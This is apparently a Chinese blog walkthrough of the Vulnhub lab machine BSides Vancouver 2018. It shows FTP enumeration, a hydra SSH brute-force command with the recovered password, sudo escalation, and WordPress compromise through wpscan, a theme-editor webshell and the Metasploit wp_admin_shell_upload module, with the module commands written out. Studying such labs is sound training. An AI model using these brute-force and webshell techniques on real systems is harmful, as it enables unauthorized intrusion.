• Vulnhub-靶机-BSides Vancouver: 2018 (Workshop)

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现,本次是直接根据靶机目标给出的地址进行测试

    目标靶机的下载地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/

     发现开放了3个端口,分别是21,22,80这3个端口,我们先尝试访问21端口看看

    因为上述nmap的扫描结果已经探测出来可以匿名登陆,我直接使用匿名登陆的方式登陆成功并发现目录public,访问该目录看到文件users.txt.bk  ,下载下来查看文件发现有可能是用户名,而且根据这个文件的命名格式也可确定是用户名,那么可以根据目标开放了22端口,可以使用ssh尝试登陆这些用户名试试

    for user in $(cat users.txt.bk); do ssh $user@192.168.5.138; done

     使用for循环尝试每个用户,发现只有anne是可以通过密码登陆,其他的用户均只能使用密钥登陆,那么我们尝试暴力破解密码试试

     hydra -l anne -P /usr/share/wordlists/rockyou.txt -f -e nsr -o bsides.txt -t 4 ssh://192.168.5.138

    发现账户名和密码

    [22][ssh] host: 192.168.5.138   login: anne   password: princess

    这是关于hydra的参数解释:http://www.luxinzhi.com/safe/438.html

    现在有了账户和密码那么我们就试试账户和密码使用ssh登陆看看

    成功登陆,发现权限极大,可以通过sudo直接提权

    使用sudo -i即可提权

    ---------------------------------------------------------------------------------------------------------------------------------------------------------------

    另一种思路

    访问web页面

    尝试暴力猜解目录

    dirb http://192.168.5.138

     gobuster dir -u http://192.168.5.138 -w /usr/share/dirb/wordlists/common.txt

     根据上述暴力破解目录发现的robots.txt文件,访问得到如下结果,这里在刚开始nmap扫描的结果也有体现

     得到目录/backup_wordpress 尝试访问得到如下结果:

    确认是个WordPress,那么我们使用wpscan来专门扫描一下

    发现存在两个用户名john和admin

     得到用户名和密码为:john / enigma

     登陆到目标web应用直接改主题模板为webshell代码

    获得webshell

     也可以写入一句话拿shell方法是一样的

    msf5 > use exploit/unix/webapp/wp_admin_shell_upload
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.5.138
    rhost => 192.168.5.138
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup_wordpress
    targeturi => /backup_wordpress
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username john
    username => john
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password enigma
    password => enigma
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

     拿到权限后,提权跟上面思路一样

    常见的WordPress通过插件和主题获取webshell的路径

    http://192.168.5.138/backup_wordpress/wp-content/plugins/akismet/akismet.php

    http://192.168.5.138/backup_wordpress/wp-content/themes/twentysixteen/archive.php

    http://192.168.5.138/backup_wordpress/wp-content/themes/twentysixteen/template-parts/content.php

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Python连接MySQL
    Python监控文件夹 && 发送邮件
    CentOS安装Redis
    weak_ptr
    libevent(六)http server
    libevent(五)使用例子
    laravel查询数据库获取结果如何判断是否为空?
    centos7 php-fpm 开机启动
    centos7 防火墙
    Laravel
  • 原文地址:https://www.cnblogs.com/autopwn/p/13529264.html
Copyright © 2020-2023  润新知